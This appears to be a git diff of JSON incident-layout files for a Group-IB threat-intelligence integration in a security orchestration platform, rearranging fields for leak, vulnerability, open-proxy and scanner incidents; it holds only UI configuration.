+ "endCol": 2, + "fieldId": "gibadmiraltycode", "height": 22, - "id": "998326e0-7371-11eb-8aef-c39e29f029fe", + "id": "89b512f0-71a6-11ef-8c49-f9d8b5e80cf6", "index": 0, "sectionItemType": "field", "startCol": 0 }, { - "endCol": 4, - "fieldId": "gibseverity", + "endCol": 2, + "fieldId": "gibcredibility", "height": 22, - "id": "ccadc250-72c7-11eb-9bde-efbce7414b24", + "id": "9228c530-71a6-11ef-8c49-f9d8b5e80cf6", "index": 1, "sectionItemType": "field", "startCol": 0 }, { - "endCol": 4, - "fieldId": "gibdatahash", + "endCol": 2, + "fieldId": "gibreliability", "height": 22, - "id": "9f22aa80-7371-11eb-8aef-c39e29f029fe", + "id": "9839cf50-71a6-11ef-8c49-f9d8b5e80cf6", "index": 2, "sectionItemType": "field", "startCol": 0 }, { - "endCol": 4, - "fieldId": "gibid", + "endCol": 2, + "fieldId": "gibseverity", "height": 22, - "id": "5ff80ed0-72c8-11eb-9bde-efbce7414b24", + "id": "9dfda3d0-71a6-11ef-8c49-f9d8b5e80cf6", "index": 3, "sectionItemType": "field", "startCol": 0 - }, + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 1, + "y": 8 + }, + { + "displayType": "ROW", + "h": 6, + "hideName": false, + "i": "caseinfoid-3ee4b320-71a6-11ef-8c49-f9d8b5e80cf6", + "items": [ { "dropEffect": "move", - "endCol": 4, - "fieldId": "gibportallink", + "endCol": 6, + "fieldId": "gibid", "height": 22, - "id": "daf41620-72c7-11eb-9bde-efbce7414b24", - "index": 4, - "listId": "caseinfoid-34740850-72c7-11eb-9bde-efbce7414b24", + "id": "55c44290-71a6-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "listId": "caseinfoid-3ee4b320-71a6-11ef-8c49-f9d8b5e80cf6", "sectionItemType": "field", "startCol": 0 }, { - "endCol": 4, - "fieldId": "gibleakeddata", - "height": 44, - "id": "b696b1c0-7371-11eb-8aef-c39e29f029fe", - "index": 5, + "endCol": 6, + "fieldId": "gibdatecreated", + "height": 22, + "id": "624e6770-71a6-11ef-8c49-f9d8b5e80cf6", + "index": 1, "sectionItemType": "field", "startCol": 0 }, { "dropEffect": "move", - "endCol": 4, - "fieldId": "giblinklist", + "endCol": 6, + "fieldId": "gibleakeddata", "height": 44, - "id": "c64b1480-7371-11eb-8aef-c39e29f029fe", + "id": "680c4880-71a6-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "listId": "caseinfoid-3ee4b320-71a6-11ef-8c49-f9d8b5e80cf6", + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibdatahash", + "height": 22, + "id": "4c981e80-8088-11ef-a600-b99923f2ff53", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibportallink", + "height": 22, + "id": "53e63730-8493-11ef-87c7-cfae65ac92d0", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibmatchestable", + "height": 106, + "id": "0b598b20-8088-11ef-a600-b99923f2ff53", "index": 6, - "listId": "caseinfoid-34740850-72c7-11eb-9bde-efbce7414b24", "sectionItemType": "field", "startCol": 0 }, { - "dropEffect": "move", - "endCol": 4, - "fieldId": "gibmatches", - "height": 44, - "id": "d827d580-7371-11eb-8aef-c39e29f029fe", + "endCol": 6, + "fieldId": "giblinklisttable", + "height": 106, + "id": "152b6dd0-8088-11ef-a600-b99923f2ff53", "index": 7, - "listId": "caseinfoid-34740850-72c7-11eb-9bde-efbce7414b24", "sectionItemType": "field", "startCol": 0 } ], "maxW": 3, "minH": 1, - "minW": 1, "moved": false, - "name": "Information from GIB TIA", + "name": "Information from Group-IB", "static": false, - "w": 2, + "w": 3, "x": 0, "y": 2 } @@ -428,6 +478,5 @@ "name": "GIB OSI Public Leak Layout", "system": false, "version": -1, - "fromVersion": "6.0.0", - "marketplaces": ["xsoar"] + "fromVersion": "0.0.0" } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Vulnerability_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Vulnerability_Layout.json new file mode 100644 index 000000000000..bf8fc6d1dae5 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Vulnerability_Layout.json @@ -0,0 +1,652 @@ +{ + "description": "Layout for GIB OSI Vulnerability", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 13 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 11 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 13 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 9 + }, + { + "displayType": "ROW", + "h": 3, + "hideName": false, + "i": "caseinfoid-0a6f5400-71a7-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 6, + "fieldId": "gibid", + "height": 22, + "id": "7e231440-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibbulletinfamily", + "height": 22, + "id": "812ad600-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "description", + "height": 22, + "id": "8532c9b0-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibextendeddescription", + "height": 44, + "id": "89c941c0-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibreporter", + "height": 22, + "id": "8d1119c0-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibhasexploit", + "height": 22, + "id": "9212d6c0-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibhref", + "height": 22, + "id": "97493850-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibmergedcvss", + "height": 22, + "id": "9afa3260-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibvulnerabilitytype", + "height": 22, + "id": "a21d6fd0-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 8, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibportallink", + "height": 22, + "id": "39a63eb0-8493-11ef-87c7-cfae65ac92d0", + "index": 9, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibcpetable", + "height": 106, + "id": "5366d250-8093-11ef-b173-316cf3bf485c", + "index": 10, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 3, + "x": 0, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-0b3207c0-71a7-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "6c7a0d70-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatemodified", + "height": 22, + "id": "7011da30-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatepublished", + "height": 22, + "id": "74626fa0-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Dates", + "static": false, + "w": 1, + "x": 1, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-0be68ab0-71a7-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibcvssscore", + "height": 22, + "id": "3ec63930-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcvssvector", + "height": 22, + "id": "41d43c80-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibextendedcvssbase", + "height": 22, + "id": "46ac0350-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibextendedcvssexploitability", + "height": 22, + "id": "4d4d6690-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibextendedcvssimpact", + "height": 22, + "id": "50a2fa30-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibextendedcvssoverall", + "height": 22, + "id": "597658a0-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibextendedcvsstemporal", + "height": 22, + "id": "5c71e560-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB CVSS Information", + "static": false, + "w": 1, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-0c8ba450-71a7-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibaffectedsoftwaretable", + "height": 22, + "id": "b5efbfa0-8097-11ef-85a7-fdd86aeef103", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Affected Software", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-0d1790a0-71a7-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "1a71d6c0-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "1dc71c40-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "2160e4d0-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "24525f70-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB OSI Vulnerability Layout", + "name": "GIB OSI Vulnerability Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_Open_Proxy_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_Open_Proxy_Layout.json new file mode 100644 index 000000000000..86d7e5933fb8 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_Open_Proxy_Layout.json @@ -0,0 +1,489 @@ +{ + "description": "Layout for GIB Suspicious IP Open Proxy", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 7 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 5 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 9 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-71696900-71a9-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "807e0950-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "83838120-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "867ff840-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "892a57c0-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 3, + "hideName": false, + "i": "caseinfoid-722517e0-71a9-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibid", + "height": 22, + "id": "8c5b4c60-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "8f834050-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "933db040-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdateofdetection", + "height": 22, + "id": "9620abf0-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibproxyport", + "height": 22, + "id": "99029630-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibproxysource", + "height": 22, + "id": "9c4da280-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibproxysources", + "height": 22, + "id": "9d3a2560-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibproxytype", + "height": 22, + "id": "a187fbb0-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "dropEffect": "move", + "endCol": 2, + "fieldId": "gibportallink", + "height": 22, + "id": "a41cb050-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 8, + "listId": "caseinfoid-722517e0-71a9-11ef-8c49-f9d8b5e80cf6", + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Suspicious IP Open Proxy Layout", + "name": "GIB Suspicious IP Open Proxy Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_Scanner_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_Scanner_Layout.json new file mode 100644 index 000000000000..bd4fa42fe89d --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_Scanner_Layout.json @@ -0,0 +1,451 @@ +{ + "description": "Layout for GIB Suspicious IP Scanner", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 8 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 